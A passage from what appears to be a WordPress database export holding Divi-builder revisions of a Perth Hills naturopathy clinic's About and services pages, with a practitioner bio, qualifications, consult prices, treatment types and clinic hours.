avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<span style=\"font-family: Montserrat; font;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span>\n\n<span style=\"font-family: Montserrat; font\"> </span>\n\n<span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span>\n\n<span style=\"font-family: Montserrat; ;\">Bachelor of Health Science (Naturopathy) </span>\n\n<span style=\"font-family: Montserrat; font-;\">Bachelor of Science (Biological Science) </span>\n\n<span style=\"font-family: Montserrat; ;\"> </span>\n\n<span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span>\n\n<span style=\"font-family: Montserrat; font;\">Australian Natural Therapist’s Association (ANTA) - Full member</span>\n<ul></ul>\n<span style=\"font-family: Montserrat;\"></span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2021-08-11 13:40:29','2021-08-11 05:40:29','',27,'https://verdenaturopathy.com.au/?p=335',0,'revision','',0),(334,1,'2021-08-11 13:39:12','2021-08-11 05:39:12','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\" sticky_enabled=\"0\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support healing in many conditions, including but not limited to:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>gastrointestinal issues (IBS, IBD, GORD)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>hormonal imbalance (PCOS, endometriosis, PMS, menopause)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (45 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" 